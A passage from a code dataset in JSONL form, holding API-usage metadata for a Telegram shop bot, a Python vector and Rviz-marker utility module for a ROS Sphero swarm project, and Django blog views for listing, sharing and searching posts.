45, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 51, "usage_type": "call"}, {"api_name": "db.manager.get_user_language", "line_number": 52, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 61, "usage_type": "call"}, {"api_name": "fetch.baseUrl", "line_number": 71, "usage_type": "name"}, {"api_name": "run.bot.send_message", "line_number": 83, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 83, "usage_type": "name"}, {"api_name": "keyboards.basket_keyboard", "line_number": 83, "usage_type": "call"}, {"api_name": "run.dp.message_handler", "line_number": 43, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 43, "usage_type": "name"}, {"api_name": "run.types.Message", "line_number": 88, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 88, "usage_type": "name"}, {"api_name": "db.manager.is_authenticated", "line_number": 89, "usage_type": "call"}, {"api_name": "db.manager.get_user_language", "line_number": 90, "usage_type": "call"}, {"api_name": "fetch.get_address", "line_number": 91, "usage_type": "call"}, {"api_name": "run.AddressStateGroup.city.set", "line_number": 94, "usage_type": "call"}, {"api_name": "run.AddressStateGroup.city", "line_number": 94, "usage_type": "attribute"}, {"api_name": "run.AddressStateGroup", "line_number": 94, "usage_type": "name"}, {"api_name": "utils.send_message_local", "line_number": 95, "usage_type": "call"}, {"api_name": "utils.send_message_local", "line_number": 97, "usage_type": "call"}, {"api_name": "utils.send_message_local", "line_number": 99, "usage_type": "call"}, {"api_name": "run.dp.message_handler", "line_number": 87, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 87, "usage_type": "name"}, {"api_name": "fetch.get_category_products", "line_number": 109, "usage_type": "call"}, {"api_name": "db.manager.get_user_language", "line_number": 110, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 119, "usage_type": "call"}, {"api_name": "utils.translate_text", "line_number": 123, "usage_type": "call"}, {"api_name": "run.types.Message", "line_number": 140, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 140, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.storage.FSMContext", "line_number": 140, "usage_type": "name"}, {"api_name": "db.manager.get_user_language", "line_number": 141, "usage_type": "call"}, {"api_name": "run.AddressStateGroup.next", "line_number": 146, "usage_type": "call"}, {"api_name": "run.AddressStateGroup", "line_number": 146, "usage_type": "name"}, {"api_name": "utils.send_message_local", "line_number": 147, "usage_type": "call"}, {"api_name": "run.dp.message_handler", "line_number": 139, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 139, "usage_type": "name"}, {"api_name": "run.AddressStateGroup.city", "line_number": 139, "usage_type": "attribute"}, {"api_name": "run.AddressStateGroup", "line_number": 139, "usage_type": "name"}, {"api_name": "run.types.Message", "line_number": 151, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 151, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.storage.FSMContext", "line_number": 151, "usage_type": "name"}, {"api_name": "db.manager.get_user_language", "line_number": 152, "usage_type": "call"}, {"api_name": "run.AddressStateGroup.next", "line_number": 157, "usage_type": "call"}, {"api_name": "run.AddressStateGroup", "line_number": 157, "usage_type": "name"}, {"api_name": "utils.send_message_local", "line_number": 160, "usage_type": "call"}, {"api_name": "run.dp.message_handler", "line_number": 150, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 150, "usage_type": "name"}, {"api_name": "run.AddressStateGroup.district", "line_number": 150, "usage_type": "attribute"}, {"api_name": "run.AddressStateGroup", "line_number": 150, "usage_type": "name"}, {"api_name": "run.types.Message", "line_number": 165, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 165, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.storage.FSMContext", "line_number": 165, "usage_type": "name"}, {"api_name": "db.manager.get_user_language", "line_number": 166, "usage_type": "call"}, {"api_name": "fetch.create_address", "line_number": 177, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 177, "usage_type": "call"}, {"api_name": "utils.send_message_local", "line_number": 180, "usage_type": "call"}, {"api_name": "run.dp.message_handler", "line_number": 164, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 164, "usage_type": "name"}, {"api_name": "run.AddressStateGroup.house", "line_number": 164, "usage_type": "attribute"}, {"api_name": "run.AddressStateGroup", "line_number": 164, "usage_type": "name"}, {"api_name": "run.types.Message", "line_number": 188, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 188, "usage_type": "name"}, {"api_name": "db.manager.get_user_language", "line_number": 189, "usage_type": "call"}, {"api_name": "utils.send_message_local", "line_number": 192, "usage_type": "call"}, {"api_name": "keyboards.category_keyboards", "line_number": 192, "usage_type": "call"}, {"api_name": "run.dp.message_handler", "line_number": 187, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 187, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.filters.Text", "line_number": 187, "usage_type": "call"}, {"api_name": "run.types.Location", "line_number": 196, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 196, "usage_type": "name"}, {"api_name": "fetch.user_me", "line_number": 197, "usage_type": "call"}, {"api_name": "run.bot.send_message", "line_number": 200, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 200, "usage_type": "name"}, {"api_name": "run.bot.send_message", "line_number": 203, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 203, "usage_type": "name"}, {"api_name": "run.dp.message_handler", "line_number": 195, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 195, "usage_type": "name"}, {"api_name": "run.types.Message", "line_number": 207, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 207, "usage_type": "name"}, {"api_name": "db.manager.get_user_language", "line_number": 208, "usage_type": "call"}, {"api_name": "utils.send_message_local", "line_number": 210, "usage_type": "call"}, {"api_name": "keyboards.get_location_keyboards", "line_number": 210, "usage_type": "call"}, {"api_name": "run.dp.message_handler", "line_number": 206, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 206, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.filters.Text", "line_number": 206, "usage_type": "call"}, {"api_name": "run.types.Message", "line_number": 216, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 216, "usage_type": "name"}, {"api_name": "run.dp.message_handler", "line_number": 215, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 215, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.filters.Text", "line_number": 215, "usage_type": "call"}, {"api_name": "run.types.Message", "line_number": 223, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 223, "usage_type": "name"}, {"api_name": "db.manager.get_user_language", "line_number": 224, "usage_type": "call"}, {"api_name": "fetch.user_me", "line_number": 225, "usage_type": "call"}, {"api_name": "fetch.get_categories", "line_number": 227, "usage_type": "call"}, {"api_name": "fetch.get_category_products", "line_number": 232, "usage_type": "call"}, {"api_name": "run.bot.send_message", "line_number": 236, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 236, "usage_type": "name"}, {"api_name": "keyboards.products_keyboard", "line_number": 236, "usage_type": "call"}, {"api_name": "run.UpdateUserState.first_name.set", "line_number": 240, "usage_type": "call"}, {"api_name": "run.UpdateUserState.first_name", "line_number": 240, "usage_type": "attribute"}, {"api_name": "run.UpdateUserState", "line_number": 240, "usage_type": "name"}, {"api_name": "utils.send_message_local", "line_number": 241, "usage_type": "call"}, {"api_name": "run.UpdateUserState.last_name.set", "line_number": 244, "usage_type": "call"}, {"api_name": "run.UpdateUserState.last_name", "line_number": 244, "usage_type": "attribute"}, {"api_name": "run.UpdateUserState", "line_number": 244, "usage_type": "name"}, {"api_name": "utils.send_message_local", "line_number": 245, "usage_type": "call"}, {"api_name": "run.dp.message_handler", "line_number": 222, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 222, "usage_type": "name"}, {"api_name": "run.types.Message", "line_number": 252, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 252, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.storage.FSMContext", "line_number": 252, "usage_type": "name"}, {"api_name": "db.manager.get_user_language", "line_number": 253, "usage_type": "call"}, {"api_name": "fetch.user_me", "line_number": 254, "usage_type": "call"}, {"api_name": "fetch.update_user", "line_number": 267, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 267, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 268, "usage_type": "call"}, {"api_name": "utils.send_message_local", "line_number": 273, "usage_type": "call"}, {"api_name": "utils.send_message_local", "line_number": 277, "usage_type": "call"}, {"api_name": "run.dp.message_handler", "line_number": 251, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 251, "usage_type": "name"}, {"api_name": "run.UpdateUserState.first_name", "line_number": 251, "usage_type": "attribute"}, {"api_name": "run.UpdateUserState", "line_number": 251, "usage_type": "name"}, {"api_name": "run.types.Message", "line_number": 283, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 283, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.storage.FSMContext", "line_number": 283, "usage_type": "name"}, {"api_name": "db.manager.get_user_language", "line_number": 284, "usage_type": "call"}, {"api_name": "fetch.user_me", "line_number": 285, "usage_type": "call"}, {"api_name": "fetch.update_user", "line_number": 293, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 293, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 294, "usage_type": "call"}, {"api_name": "utils.send_message_local", "line_number": 298, "usage_type": "call"}, {"api_name": "utils.send_message_local", "line_number": 302, "usage_type": "call"}, {"api_name": "run.dp.message_handler", "line_number": 282, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 282, "usage_type": "name"}, {"api_name": "run.UpdateUserState.last_name", "line_number": 282, "usage_type": "attribute"}, {"api_name": "run.UpdateUserState", "line_number": 282, "usage_type": "name"}, {"api_name": "run.types.CallbackQuery", "line_number": 310, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 310, "usage_type": "name"}, {"api_name": "re.findall", "line_number": 317, "usage_type": "call"}, {"api_name": "db.manager.drop_all_cart", "line_number": 326, "usage_type": "call"}, {"api_name": "db.manager.get_user_language", "line_number": 327, "usage_type": "call"}, {"api_name": "utils.send_message_local", "line_number": 329, "usage_type": "call"}, {"api_name": "db.manager.get_cart_products", "line_number": 335, "usage_type": "call"}, {"api_name": "fetch.get_address", "line_number": 340, "usage_type": "call"}, {"api_name": "db.manager.get_user_language", "line_number": 341, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 349, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 357, "usage_type": "call"}, {"api_name": "fetch.create_order", "line_number": 380, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 380, "usage_type": "call"}, {"api_name": "db.manager.drop_all_cart", "line_number": 381, "usage_type": "call"}, {"api_name": "run.bot.send_message", "line_number": 384, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 384, "usage_type": "name"}, {"api_name": "utils.translate_text", "line_number": 384, "usage_type": "call"}, {"api_name": "run.bot.send_message", "line_number": 387, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 387, "usage_type": "name"}, {"api_name": "utils.translate_text", "line_number": 387, "usage_type": "call"}, {"api_name": "db.manager.get_user_language", "line_number": 393, "usage_type": "call"}, {"api_name": "db.manager.get_cart_products", "line_number": 395, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 396, "usage_type": "call"}, {"api_name": "run.ProductEditState.square.set", "line_number": 400, "usage_type": "call"}, {"api_name": "run.ProductEditState.square", "line_number": 400, "usage_type": "attribute"}, {"api_name": "run.ProductEditState", "line_number": 400, "usage_type": "name"}, {"api_name": "run.bot.send_message", "line_number": 406, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 406, "usage_type": "name"}, {"api_name": "utils.translate_text", "line_number": 406, "usage_type": "call"}, {"api_name": "fetch.get_categories", "line_number": 410, "usage_type": "call"}, {"api_name": "fetch.get_category_products", "line_number": 421, "usage_type": "call"}, {"api_name": "run.bot.delete_message", "line_number": 424, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 424, "usage_type": "name"}, {"api_name": "run.bot.send_message", "line_number": 432, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 432, "usage_type": "name"}, {"api_name": "keyboards.products_keyboard", "line_number": 432, "usage_type": "call"}, {"api_name": "fetch.get_category_products", "line_number": 441, "usage_type": "call"}, {"api_name": "run.bot.delete_message", "line_number": 444, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 444, "usage_type": "name"}, {"api_name": "run.bot.send_message", "line_number": 452, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 452, "usage_type": "name"}, {"api_name": "keyboards.products_keyboard", "line_number": 452, "usage_type": "call"}, {"api_name": "db.manager.get_user_language", "line_number": 464, "usage_type": "call"}, {"api_name": "fetch.get_product_from_list", "line_number": 466, "usage_type": "call"}, {"api_name": "fetch.baseUrl", "line_number": 467, "usage_type": "name"}, {"api_name": "fetch.get_color", "line_number": 475, "usage_type": "call"}, {"api_name": "utils.translate_text", "line_number": 479, "usage_type": "call"}, {"api_name": "fetch.baseUrl", "line_number": 482, "usage_type": "name"}, {"api_name": "fetch.get_category", "line_number": 483, "usage_type": "call"}, {"api_name": "utils.translate_text", "line_number": 486, "usage_type": "call"}, {"api_name": "run.bot.send_photo", "line_number": 489, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 489, "usage_type": "name"}, {"api_name": "keyboards.add_cart_keyboards", "line_number": 489, "usage_type": "call"}, {"api_name": "db.manager.get_user_language", "line_number": 494, "usage_type": "call"}, {"api_name": "fetch.get_product", "line_number": 497, "usage_type": "call"}, {"api_name": "db.manager.is_authenticated", "line_number": 500, "usage_type": "call"}, {"api_name": "db.manager.add_to_cart", "line_number": 501, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 501, "usage_type": "call"}, {"api_name": "run.bot.send_message", "line_number": 504, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 504, "usage_type": "name"}, {"api_name": "utils.translate_text", "line_number": 504, "usage_type": "call"}, {"api_name": "run.bot.send_message", "line_number": 506, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 506, "usage_type": "name"}, {"api_name": "utils.translate_text", "line_number": 506, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 507, "usage_type": "call"}, {"api_name": "run.bot.delete_message", "line_number": 508, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 508, "usage_type": "name"}, {"api_name": "run.dp.callback_query_handler", "line_number": 309, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 309, "usage_type": "name"}, {"api_name": "run.types.Message", "line_number": 513, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 513, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.storage.FSMContext", "line_number": 513, "usage_type": "name"}, {"api_name": "db.manager.get_user_language", "line_number": 516, "usage_type": "call"}, {"api_name": "db.manager.update_cart", "line_number": 523, "usage_type": "call"}, {"api_name": "run.bot.send_message", "line_number": 525, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 525, "usage_type": "name"}, {"api_name": "utils.translate_text", "line_number": 525, "usage_type": "call"}, {"api_name": "utils.send_message_local", "line_number": 529, "usage_type": "call"}, {"api_name": "run.dp.message_handler", "line_number": 512, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 512, "usage_type": "name"}, {"api_name": "run.ProductEditState.square", "line_number": 512, "usage_type": "attribute"}, {"api_name": "run.ProductEditState", "line_number": 512, "usage_type": "name"}]} +{"seq_id": "22830814074", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThis module is used for utility and helper functions.\n\nClasses:\n Vector2: 2D vector class representation with x and y components\n MarkerSet: convenience class for handling interactive Rviz markers\n\nFunction:\n pose_dist: calculate distance between two ROS Pose type variables\n\"\"\"\n\nimport math\nimport rospy\nimport logging\nimport numpy as np\nfrom visualization_msgs.msg import Marker, MarkerArray\nfrom std_msgs.msg import ColorRGBA\nfrom geometry_msgs.msg import Pose, Vector3, Quaternion\nfrom tf.transformations import quaternion_from_euler\n\n\nclass Vector2(object):\n \"\"\"\n 2D vector class representation with x and y components.\n\n Supports simple addition, subtraction, multiplication, division and\n normalization, as well as getting norm and angle of the vector and\n setting limit and magnitude.\n\n Attributes:\n x (float): x component of the vector\n y (float): y component of the vector\n\n Methods:\n norm(self): Return the norm of the vector\n arg(self): Return the angle of the vector\n normalize(self): Normalize the vector\n limit(self, value): Limit vector's maximum magnitude to given value\n set_mag(self, value): Set vector's magnitude without changing direction\n \"\"\"\n\n def __init__(self, x=0, y=0):\n \"\"\"\n Initialize vector components.\n\n Args:\n x (float): x component of the vector\n y (float): y component of the vector\n \"\"\"\n self.x = x\n self.y = y\n\n @classmethod\n def from_norm_arg(cls, norm=0, arg=0):\n inst = cls(1, 1)\n inst.set_mag(norm)\n inst.set_angle(arg)\n return inst\n\n def __add__(self, other):\n if isinstance(other, self.__class__):\n return Vector2(self.x + other.x, self.y + other.y)\n elif isinstance(other, int) or isinstance(other, float):\n return Vector2(self.x + other, self.y + other)\n\n def __sub__(self, other):\n if isinstance(other, self.__class__):\n return Vector2(self.x - other.x, self.y - other.y)\n elif isinstance(other, int) or isinstance(other, float):\n return Vector2(self.x - other, self.y - other)\n\n def __div__(self, other):\n if isinstance(other, self.__class__):\n raise ValueError(\"Cannot divide two vectors!\")\n elif isinstance(other, int) or isinstance(other, float):\n if other != 0:\n return Vector2(self.x / other, self.y / other)\n else:\n return Vector2()\n\n def __mul__(self, other):\n if isinstance(other, self.__class__):\n raise NotImplementedError(\"Multiplying vectors is not implemented!\")\n elif isinstance(other, int) or isinstance(other, float):\n return Vector2(self.x * other, self.y * other)\n\n def __rmul__(self, other):\n return self.__mul__(other)\n\n def __str__(self):\n return \"({: .5f}, {: 6.1f})\".format(self.norm(), self.arg())\n # return \"({: .3f}, {: .3f})\".format(self.x, self.y)\n\n def __repr__(self):\n return \"Vector2({0}, {1})\\n\\t.norm = {2}\\n\\t.arg = {3}\".format(self.x, self.y, self.norm(), self.arg())\n\n def norm(self):\n \"\"\"Return the norm of the vector.\"\"\"\n return math.sqrt(pow(self.x, 2) + pow(self.y, 2))\n\n def arg(self):\n \"\"\"Return the angle of the vector.\"\"\"\n return math.degrees(math.atan2(self.y, self.x))\n\n def set_mag(self, value):\n \"\"\"Set vector's magnitude without changing direction.\"\"\"\n if self.norm() == 0:\n logging.warning('Trying to set magnitude for a null-vector! Angle will be set to 0!')\n self.x = 1\n self.y = 0\n else:\n self.normalize()\n self.x *= value\n self.y *= value\n\n def set_angle(self, value):\n \"\"\"Set vector's direction without changing magnitude.\"\"\"\n if self.norm() == 0:\n logging.warning('Trying to set angle for a null-vector! Magnitude will be set to 1!')\n self.x = 1\n self.y = 0\n delta = angle_diff(self.arg(), value)\n self.rotate(delta)\n\n def rotate(self, value):\n \"\"\"Rotate vector by degrees specified in value.\"\"\"\n value = math.radians(value)\n self.x, self.y = math.cos(value) * self.x - math.sin(value) * self.y, \\\n math.sin(value) * self.x + math.cos(value) * self.y\n\n def normalize(self, ret=False):\n \"\"\"Normalize the vector.\"\"\"\n d = self.norm()\n if d:\n if not ret:\n self.x /= d\n self.y /= d\n else:\n return Vector2(self.x / d, self.y / d)\n\n def limit(self, value):\n \"\"\"Limit vector's maximum magnitude to given value.\"\"\"\n if self.norm() > value:\n self.set_mag(value)\n\n def limit_lower(self, value):\n \"\"\"Limit vector's minimum magnitude to given value.\"\"\"\n if self.norm() < value:\n self.set_mag(value)\n\n def constrain(self, old_value, max_value):\n \"\"\"Limit vector's change of direction to max_value from old_value.\"\"\"\n desired_value = self.arg()\n delta = angle_diff(old_value, desired_value)\n if abs(delta) > max_value:\n value = angle_diff(desired_value, old_value + math.copysign(max_value, delta))\n self.rotate(value)\n\n\ndef angle_diff(from_angle, to_angle):\n diff = (to_angle - from_angle) % 360\n if diff >= 180:\n diff -= 360\n return diff\n\n\ndef pose_dist(pose1, pose2):\n \"\"\"Return Euclidean distance between two ROS poses.\"\"\"\n x1 = pose1.position.x\n y1 = pose1.position.y\n x2 = pose2.position.x\n y2 = pose2.position.y\n\n return math.sqrt(pow(x1 - x2, 2) + pow(y1 - y2, 2))\n\n\nclass MarkerSet(object):\n \"\"\"\n Convenience class for handling Rviz markers.\n\n Markers are used to visualize each of the Reynolds' rules component in Rviz.\n Markers are set to arrows to represent force and velocity vectors.\n \"\"\"\n def __init__(self):\n \"\"\"Initialize class and set common marker properties.\"\"\"\n self.visualization = MarkerArray()\n\n # Make sure these keys are the same as the ones in `boids.py`\n keys = ['alignment', 'cohesion', 'separation', 'avoid', 'acceleration', 'velocity', 'estimated']\n self.markers = dict.fromkeys(keys)\n\n marker_id = 0\n for key in keys:\n self.markers[key] = Marker()\n self.markers[key].header.frame_id = rospy.get_namespace() + 'base_link'\n self.markers[key].header.stamp = rospy.get_rostime()\n self.markers[key].ns = rospy.get_namespace().split('/')[1]\n self.markers[key].id = marker_id\n self.markers[key].type = Marker.ARROW\n self.markers[key].action = Marker.ADD\n self.markers[key].pose = Pose()\n self.markers[key].pose.position.z = 0.036 # Sphero radius\n self.markers[key].lifetime = rospy.Duration(0)\n self.markers[key].frame_locked = True\n marker_id += 1\n\n # Set colors of each marker\n self.markers['alignment'].color = ColorRGBA(0, 0, 1, 1) # blue\n self.markers['cohesion'].color = ColorRGBA(0, 1, 0, 1) # green\n self.markers['separation'].color = ColorRGBA(1, 0, 0, 1) # red\n self.markers['avoid'].color = ColorRGBA(1, 1, 0, 1) # yellow\n self.markers['acceleration'].color = ColorRGBA(0, 0, 0, 1) # black\n self.markers['velocity'].color = ColorRGBA(1, 1, 1, 1) # white\n self.markers['estimated'].color = ColorRGBA(1, 0.55, 0, 1) # orange\n\n def update_data(self, values):\n \"\"\"\n Set scale and direction of markers.\n\n Args:\n values (dict): Holds norm and arg data for each component\n \"\"\"\n if values is not None:\n for key in self.markers.keys():\n data = values[key]\n angle = Quaternion(*quaternion_from_euler(0, 0, math.radians(data.arg())))\n scale = Vector3(data.norm(), 0.02, 0.02)\n\n self.markers[key].header.stamp = rospy.get_rostime()\n self.markers[key].pose.orientation = angle\n self.markers[key].scale = scale\n\n self.visualization.markers = self.markers.values()\n return self.visualization\n\n\nclass MAFilter(object):\n # TODO: remove if not necessary\n \"\"\"Implementation of a moving average filter with variable window length.\"\"\"\n def __init__(self, win_length):\n \"\"\"\n Initialize empty window for averaging.\n\n Args:\n win_length: length of a window\n \"\"\"\n # Window is initialized with NaNs so that the average would be correct\n # during the first few steps while the window is not yet full\n self.window = np.array([np.nan] * win_length)\n\n def step(self, value):\n \"\"\"\n Add new value at the end of the window, shift older values to the left\n and return the average.\n \"\"\"\n self.window[:-1] = self.window[1:]\n self.window[-1] = value\n # np.nanmean returns mean value while ignoring NaNs\n return np.nanmean(self.window)\n", "repo_name": "mkrizmancic/sphero_formation", "sub_path": "src/sphero_formation/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 9230, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 16, "dataset": "github-code", "pt": "52", "api": [{"api_name": "math.sqrt", "line_number": 102, "usage_type": "call"}, {"api_name": "math.degrees", "line_number": 106, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 106, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 111, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 122, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 130, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 131, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 131, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 132, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 132, "usage_type": "call"}, {"api_name": "math.copysign", "line_number": 159, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 177, "usage_type": "call"}, {"api_name": "visualization_msgs.msg.MarkerArray", "line_number": 189, "usage_type": "call"}, {"api_name": "visualization_msgs.msg.Marker", "line_number": 197, "usage_type": "call"}, {"api_name": "rospy.get_namespace", "line_number": 198, "usage_type": "call"}, {"api_name": "rospy.get_rostime", "line_number": 199, "usage_type": "call"}, {"api_name": "rospy.get_namespace", "line_number": 200, "usage_type": "call"}, {"api_name": "visualization_msgs.msg.Marker.ARROW", "line_number": 202, "usage_type": "attribute"}, {"api_name": "visualization_msgs.msg.Marker", "line_number": 202, "usage_type": "name"}, {"api_name": "visualization_msgs.msg.Marker.ADD", "line_number": 203, "usage_type": "attribute"}, {"api_name": "visualization_msgs.msg.Marker", "line_number": 203, "usage_type": "name"}, {"api_name": "geometry_msgs.msg.Pose", "line_number": 204, "usage_type": "call"}, {"api_name": "rospy.Duration", "line_number": 206, "usage_type": "call"}, {"api_name": "std_msgs.msg.ColorRGBA", "line_number": 211, "usage_type": "call"}, {"api_name": "std_msgs.msg.ColorRGBA", "line_number": 212, "usage_type": "call"}, {"api_name": "std_msgs.msg.ColorRGBA", "line_number": 213, "usage_type": "call"}, {"api_name": "std_msgs.msg.ColorRGBA", "line_number": 214, "usage_type": "call"}, {"api_name": "std_msgs.msg.ColorRGBA", "line_number": 215, "usage_type": "call"}, {"api_name": "std_msgs.msg.ColorRGBA", "line_number": 216, "usage_type": "call"}, {"api_name": "std_msgs.msg.ColorRGBA", "line_number": 217, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Quaternion", "line_number": 229, "usage_type": "call"}, {"api_name": "tf.transformations.quaternion_from_euler", "line_number": 229, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 229, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Vector3", "line_number": 230, "usage_type": "call"}, {"api_name": "rospy.get_rostime", "line_number": 232, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 252, "usage_type": "attribute"}, {"api_name": "numpy.nanmean", "line_number": 262, "usage_type": "call"}]} +{"seq_id": "12854537422", "text": "from django.shortcuts import render, get_object_or_404\nfrom django.contrib.postgres.search import SearchVector, SearchQuery, SearchRank, TrigramSimilarity\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.views.generic import ListView\nfrom .models import Post\nfrom .forms import EmailPostForm, ComentarioForm, BuscarForm\nfrom django.core.mail import send_mail\nfrom taggit.models import Tag\nfrom django.db.models import Count\n\n\nclass PostListView(ListView):\n queryset = Post.publicados.all()\n context_object_name = 'posts'\n paginate_by = 2\n template_name = 'blog/post/post_list.html'\n\n\ndef posts_list(request, tag_slug=None):\n object_list = Post.publicados.all()\n tag = None\n if tag_slug:\n tag = get_object_or_404(Tag, slug=tag_slug)\n object_list = object_list.filter(tags__in=[tag])\n paginator = Paginator(object_list, 2)\n page = request.GET.get('page')\n try:\n posts = paginator.page(page)\n except PageNotAnInteger:\n posts = paginator.page(1)\n except EmptyPage:\n posts = paginator.page(paginator.num_pages)\n return render(request, 'blog/post/list.html', {'page': page, 'posts': posts, 'tag': tag})\n\n\ndef post_detail(request, year, month, day, post):\n post = get_object_or_404(Post,\n slug=post,\n estatus='publicado',\n publicado__year=year,\n publicado__month=month,\n publicado__day=day)\n comentarios = post.comentarios.filter(activo=True)\n comentario_nuevo = None\n if request.method == 'POST':\n comentario_form = ComentarioForm(data=request.POST)\n if comentario_form.is_valid():\n comentario_nuevo = comentario_form.save(commit=False)\n comentario_nuevo.post = post\n comentario_nuevo.save()\n else:\n comentario_form = ComentarioForm()\n post_tags_ids = post.tags.values_list('id', flat=True)\n similar_posts = Post.publicados.filter(tags__in=post_tags_ids).exclude(id=post.id)\n similar_posts = similar_posts.annotate(same_tags=Count('tags')).order_by('-same_tags', '-publicado')[:4]\n return render(request, 'blog/post/detail.html',\n {'post': post,\n 'comentarios': comentarios,\n 'comentario_nuevo': comentario_nuevo,\n 'comentario_form': comentario_form,\n 'posts_similares': similar_posts,\n })\n\n\ndef post_share(request, post_id):\n post = get_object_or_404(Post, id=post_id, estatus='publicado')\n sent = False\n\n if request.method == 'POST':\n form = EmailPostForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n # ... send email\n post_url = request.build_absolute_uri(post.get_absolute_url())\n subject = f'{cd[\"nombre\"]} ({cd[\"email\"]}) te recomienda leer \"{post.titulo}\"'\n message = f'Leer \"{post.titulo}\" en {post_url}\\n\\nComentarios de {cd[\"nombre\"]}:\\n{cd[\"comentarios\"]}'\n send_mail(subject, message, 'admin@myblog.com', [cd['para']])\n sent = True\n else:\n form = EmailPostForm()\n return render(request, 'blog/post/share.html', {'post': post, 'form': form, 'sent': sent})\n\n\ndef post_search(request):\n form = BuscarForm()\n query = None\n results = []\n if 'palabras' in request.GET:\n form = BuscarForm(request.GET)\n if form.is_valid():\n query = form.cleaned_data['palabras']\n search_vector = SearchVector('titulo', weight='A') + SearchVector('contenido', weight='B')\n search_query = SearchQuery(query)\n results = Post.objectos.annotate(\n # search=search_vector,\n # rank=SearchRank(search_vector, search_query)\n # ).filter(rank__gte=0.3).order_by('-rank')\n similarity=TrigramSimilarity('titulo', 'query')\n ).filter(similarity=0.3).order_by('-similarity')\n return render(request,\n 'blog/post/search.html',\n {'form': form,\n 'query': query,\n 'results': results})\n", "repo_name": "Roderich25/mac", "sub_path": "django-by-example/blog/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4225, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.views.generic.ListView", "line_number": 12, "usage_type": "name"}, {"api_name": "models.Post.publicados.all", "line_number": 13, "usage_type": "call"}, {"api_name": "models.Post.publicados", "line_number": 13, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 13, "usage_type": "name"}, {"api_name": "models.Post.publicados.all", "line_number": 20, "usage_type": "call"}, {"api_name": "models.Post.publicados", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 20, "usage_type": "name"}, {"api_name": 